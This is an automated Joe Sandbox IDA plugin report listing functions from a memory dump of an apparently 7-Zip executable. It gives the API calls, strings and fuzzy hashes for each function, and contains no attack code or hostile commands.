Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
Instruction ID: bcb91c66b42e560f40c0e7943f4355d282fdb6f0aabed66f0cfac9fc43e766ce
Opcode Fuzzy Hash: 9a39179057fc4b698db1469c34720306d33abb4d3d1416dbc86e8f68b6a95521
Instruction Fuzzy Hash: 5221CE23312B8586DA14EF56E98032AB3A0F745BE6B0C81F5AF2907791DF34C86AC700

Function 00B5C790 Relevance: 6.3, APIs: 5, Instructions: 62COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00B5C7BB
memcmp.MSVCRT ref: 00B5C7D6
memcmp.MSVCRT ref: 00B5C7EC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
Instruction ID: 22fbb0f14942b7d1eb67a6f26800eaafb1d231ee9b642ed1a0b68cd34982dcb7
Opcode Fuzzy Hash: 712599938bbeffd81504be00bb0ea2eb8721062aa4075a36f0ea6c542d0c478b
Instruction Fuzzy Hash: 251191A230475199EB04DB269C923B827A6D70AFC6F8890B1CE0557706EF74D949C304

Function 00B53BE4 Relevance: 6.3, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C2A
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C36
_CxxThrowException.MSVCRT ref: 00B53C54
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,FFFFFFFF), ref: 00B53C80
_CxxThrowException.MSVCRT ref: 00B53C9E

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ByteCharExceptionMultiThrowWide$ErrorLast
String ID:
API String ID: 2296236218-0
Opcode ID: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
Instruction ID: ff348549839415322cb2c15f82dc7f26c11d21f4cce6eca85f87ca0f0bf3300e
Opcode Fuzzy Hash: 970d5cdc5d485172c45e5e67665dade64923c0f4ace1f899d0aee1bf120422e8
Instruction Fuzzy Hash: 84219DB2700B4986DB10DF26E85031DB7E1FB88F99F448165DF8997724EB78C88AC710

Function 00B5182C Relevance: 6.3, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B51868
free.MSVCRT ref: 00B51872
free.MSVCRT ref: 00B5187C
free.MSVCRT ref: 00B518A9
free.MSVCRT ref: 00B518B1

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
Instruction ID: a0234bdc25e3634b26b056ce25826461c0632ea05a8229614f569685cef7c2d0
Opcode Fuzzy Hash: bfe4f0f55ee913568f211c4fbf308b9aee0fbd2fe155706c5642a99402e277d4
Instruction Fuzzy Hash: CA01C023703D4496DA24EF36D91036A2360F783FA5B1843E1AF6D27B90CF24D81AC700

Function 00B97D84 Relevance: 6.3, APIs: 5, Instructions: 42COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B97DA9
free.MSVCRT ref: 00B97DB2
free.MSVCRT ref: 00B97DE5
free.MSVCRT ref: 00B97DF2
free.MSVCRT ref: 00B97DFB

Part of subcall function 00B794A8: free.MSVCRT ref: 00B794DB
Part of subcall function 00B794A8: free.MSVCRT ref: 00B794E3
Part of subcall function 00B794A8: free.MSVCRT ref: 00B794F0
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7951C
Part of subcall function 00B794A8: free.MSVCRT ref: 00B79525
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7952D
Part of subcall function 00B794A8: free.MSVCRT ref: 00B7953A

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
Instruction ID: 7fc2726733dd1564bd917b8e57610bc5bb121d3ce8402eabe7f902b588e564c1
Opcode Fuzzy Hash: 782f6fd7dc41bf8ca513220e7cc76460a379d2f1bbd67af93ff481f02cf2e1fb
Instruction Fuzzy Hash: F9018F23757D4089CA15AF26DC5136923A4EF47FA5F1801B1AF1D1B315EF20C846C380

Function 00B73864 Relevance: 6.3, APIs: 5, Instructions: 40COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B73877

Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70BCC
Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70BD5
Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70C00
Part of subcall function 00B70BBC: free.MSVCRT ref: 00B70C08

Part of subcall function 00B71474: free.MSVCRT ref: 00B714A6
Part of subcall function 00B71474: free.MSVCRT ref: 00B714AF
Part of subcall function 00B71474: free.MSVCRT ref: 00B714B8
Part of subcall function 00B71474: free.MSVCRT ref: 00B714C0

free.MSVCRT ref: 00B73892
free.MSVCRT ref: 00B7389B
free.MSVCRT ref: 00B738C6
free.MSVCRT ref: 00B738CE

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
Instruction ID: 265eb102cd362eb11b3ee0789c53338d0757b3870fd8b0b15fc2b443b40eb63b
Opcode Fuzzy Hash: 18ccfc5564c15e61a23e9604fa5b251626cea37ac211422c809096770ce5a63d
Instruction Fuzzy Hash: 36F0A423B13C5096CA15FF26DD9126D23A0FB86F91B0C41E2AF2D5B751DF20C9668750

Function 00B7C9CC Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7C9FE
free.MSVCRT ref: 00B7CA07
free.MSVCRT ref: 00B7CA10
free.MSVCRT ref: 00B7CA19
free.MSVCRT ref: 00B7CA21

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
Instruction ID: 9766e149c1ec96218b395636291ba5b0ffa6da582e039bdf1d8f345c695e2075
Opcode Fuzzy Hash: c213d67050506c93901002ddd1084c0dd65243c9eb9d617befeb87ee319482a8
Instruction Fuzzy Hash: E7F06D13703994898A20EF26DC9126927A0AF96BAA71C41F5AF2E17754EE20C8568700

Function 00B62A84 Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B62A94
free.MSVCRT ref: 00B62A9D
free.MSVCRT ref: 00B62AC9
free.MSVCRT ref: 00B62AD1
free.MSVCRT ref: 00B62ADE

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
Instruction ID: 9479cb4cf28b11f82c282ce24db2708e0d6f3ba255b0791cc58e4cf155dac481
Opcode Fuzzy Hash: 99aac3ebba39b973ad56ba9f7cc64fb651a8512a5e29eea15e4582f1b066fd79
Instruction Fuzzy Hash: EFF09023713C4489CB25AF36DC5122A2360EB96FD671901E1AF2D2B359DE24C8468740

Function 00B7CA3C Relevance: 6.3, APIs: 5, Instructions: 36COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B7CA6E
free.MSVCRT ref: 00B7CA77
free.MSVCRT ref: 00B7CA80
free.MSVCRT ref: 00B7CA89
free.MSVCRT ref: 00B7CA91

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
Instruction ID: 41e57e7f5809bbbf693e4913ec2f58347ee6859459abfc5e2a3aa14b42a2a005
Opcode Fuzzy Hash: f7456f4712a6592163503973d257ef0995b2ed4d21bfa0f5baa221aafdf9fe8c
Instruction Fuzzy Hash: C7F096537039848DCA10EF26DC813592750EF56BAAB1C41F5BF2D17755DF20CC968740

Function 00B97690 Relevance: 6.3, APIs: 5, Instructions: 22COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B976AF
free.MSVCRT ref: 00B976BB
free.MSVCRT ref: 00B976C7
free.MSVCRT ref: 00B976D3

Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B335
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B342
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B34E
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B358
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B362
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B36C
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B376
Part of subcall function 00B9B310: free.MSVCRT ref: 00B9B380

free.MSVCRT ref: 00B976E4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
Instruction ID: 9c8f96cdedad842cd4e86daba29e34b4892d51f7c76c1e46655bc7cb806162eb
Opcode Fuzzy Hash: 80021553301d9a40d6bbe7854cc860826636cb7fafc5824219d75b22b7ddba10
Instruction Fuzzy Hash: 0AE0C93331398081CA50EF35D8952ED23A0EB9AB59F1801F1AE2E9E362DE10C9978B54

Function 00B902F0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 00B903A1
memmove.MSVCRT ref: 00B903F9
_CxxThrowException.MSVCRT ref: 00B90454

Strings

Internal collision in update action set, xrefs: 00B90383, 00B9043C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrow$memmove
String ID: Internal collision in update action set
API String ID: 265668421-2378581463
Opcode ID: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
Instruction ID: a34fc420bfb73f816c1128f6ad07f971927ee404a29c012a7c772cc35fecf541
Opcode Fuzzy Hash: 2489d0cffbcfc2a2b50f9be8098032778b6c83d9b82680e9d68b7dd3d3502d6c
Instruction Fuzzy Hash: BB41E1333286858EDF24EB1AE45476E7BE0F399788F448265EB8903B58DB78D585CB04

Function 00B94594 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B946C5
free.MSVCRT ref: 00B946DD
free.MSVCRT ref: 00B946E7

Part of subcall function 00B52C78: free.MSVCRT ref: 00B52CAE

Strings

= , xrefs: 00B9461C, 00B94634

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: =
API String ID: 1294909896-2525689732
Opcode ID: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
Instruction ID: 6a6e23929e50b6a549f0ac45507fd0f10d1ce033ed7d89f41362af34df77c62e
Opcode Fuzzy Hash: 40c11fba967689670f12ed8931cb4eba44630f327dd0b6864abb2cd98b0bc6cc
Instruction Fuzzy Hash: 77319363316A8096CB10DF55E49075EB7A0F7D67A1F9442E1FA8E43A68DB78C94ACB00

Function 00B86D5C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B86E91

Part of subcall function 00B53518: free.MSVCRT ref: 00B53551

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B86E83

Strings

exe, xrefs: 00B86DEE

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: exe
API String ID: 1534225298-1801697008
Opcode ID: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
Instruction ID: bd1db6b7c5e850c88fb75b3586f3274ccda7982ff0990c07aeab6e03620f2769
Opcode Fuzzy Hash: 76770eb1b0aff3fcbaddab3083a3c2637205f7744bad9aa1b7e03b28f3d0466f
Instruction Fuzzy Hash: F131942330194196CA21FB25E45029EB7B0E785BD5F845292EF9E47779DF28C64ACB00

Function 00B79380 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B793B0
SysStringByteLen.OLEAUT32 ref: 00B79411
free.MSVCRT ref: 00B7942C
memmove.MSVCRT ref: 00B79462

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ByteStringmemmove
String ID:
API String ID: 400576877-0
Opcode ID: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
Instruction ID: 5bcc743f26bf4998a8637aa2fab5bd09efe0ac61a9be2ac415242d6cd9023855
Opcode Fuzzy Hash: 627be9a5ab345c6a2ae9b3d4a8fa1f013a1db37638386f1ebadb93c6192a02ff
Instruction Fuzzy Hash: 8721A333305B8092EB349F51E59036972E0FB887A0F4882A5AFAE4B794DF38C856C704

Function 00B79644 Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

wcscmp.MSVCRT ref: 00B796D5
free.MSVCRT ref: 00B796F1
free.MSVCRT ref: 00B79706

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$wcscmp
String ID:
API String ID: 4021281200-0
Opcode ID: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
Instruction ID: cb8cd9a9254e50279c07b1b7fe295ccf424299ea7914f14d971397ae321d2ad9
Opcode Fuzzy Hash: 1721c6616b74a4c47d99cfe980b2e26b6a86647a23934d96b3aa9ed1d32fc9d1
Instruction Fuzzy Hash: 1321B07731474092DB20AF26E44136977A1E7D5BE4F1493A1EE7E87794EB38CA86CB00

Function 00B5FADC Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5FB44

Strings

Unsupported charset:, xrefs: 00B5FB91

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID: Unsupported charset:
API String ID: 1294909896-616772432
Opcode ID: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
Instruction ID: aa81f16fa4286e317a3d41cf9fb64911912dd295f00455d174e62fb58305f6cc
Opcode Fuzzy Hash: 9e42c2d2b4e1f7d5b703db533c77dc73d7d9a80e6522a8e966b0da96d7856300
Instruction Fuzzy Hash: 9F219563605601D2DA20EB18D8903A9B7A1E7C57E5F5442E2EEAD077A5CF68C989C740

Function 00B56D48 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00B57D4C: GetFileAttributesW.KERNELBASE ref: 00B57D6E
Part of subcall function 00B57D4C: GetFileAttributesW.KERNEL32 ref: 00B57DA5
Part of subcall function 00B57D4C: free.MSVCRT ref: 00B57DB2

DeleteFileW.KERNEL32 ref: 00B56D90
DeleteFileW.KERNEL32 ref: 00B56DCA
free.MSVCRT ref: 00B56DDA
free.MSVCRT ref: 00B56DE8

Part of subcall function 00B568A0: SetFileAttributesW.KERNELBASE ref: 00B568C7

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: File$Attributesfree$Delete
String ID:
API String ID: 324319583-0
Opcode ID: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
Instruction ID: 6917b00c70744d7bbe1976cb747877da4636d1d68c6c5ebc0ad8a9c40449969c
Opcode Fuzzy Hash: 9ea681c350cecb0b42c71b1f35ea49690d0665b5843397cde649d2af5f6ea4c4
Instruction Fuzzy Hash: AB016522344A0141CA34AF24E85136963B19B8A7B6F9817F1AD7A973E5DE24CD5EC600

Function 00B6211C Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B62137
free.MSVCRT ref: 00B621BB

Part of subcall function 00B56618: FormatMessageW.KERNEL32 ref: 00B56676
Part of subcall function 00B56618: LocalFree.KERNEL32 ref: 00B56698

Part of subcall function 00B5362C: memmove.MSVCRT ref: 00B53659

free.MSVCRT ref: 00B62182

Strings

: , xrefs: 00B62151, 00B62187

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$ErrorFormatFreeLastLocalMessagememmove
String ID: :
API String ID: 1743135865-3653984579
Opcode ID: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction ID: 8d0fdf515b6a735fc90d8901745ab11ea8aa59d9dabe12a31ea155ae33480aab
Opcode Fuzzy Hash: 0bd9cf6b41112b825cc91f2e3a5d39e6d602e68f921f465e2c8b822415a3c1c2
Instruction Fuzzy Hash: 4801A953305D0090CA20EB25E89035E77A1EBC5BF5F5453A5BE5E477B9DE38CA8AC740

Function 00B5C878 Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00B5C898
ReadFile.KERNEL32 ref: 00B5C8B3
GetLastError.KERNEL32 ref: 00B5C8CD
GetLastError.KERNEL32 ref: 00B5C8DC

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
Instruction ID: b172758df3727f2f0c622d4f7e8724c13fe589b7d756d3e7b727df841c934eaa
Opcode Fuzzy Hash: e021971f243c9fea39bb415f90c700eab78ade398cc3b993660b20944e3800b0
Instruction Fuzzy Hash: A101D4126202618BD7225B3DAC0037966D5F708BE2F9441B1FE4AEBA60DB28CC898780

Function 00B9ACDC Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON

Download Yara Rule

Strings

Break signaled, xrefs: 00B9AD14
ERROR: Can't allocate required memory!, xrefs: 00B9ACF6
System ERROR:, xrefs: 00B9AD34

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
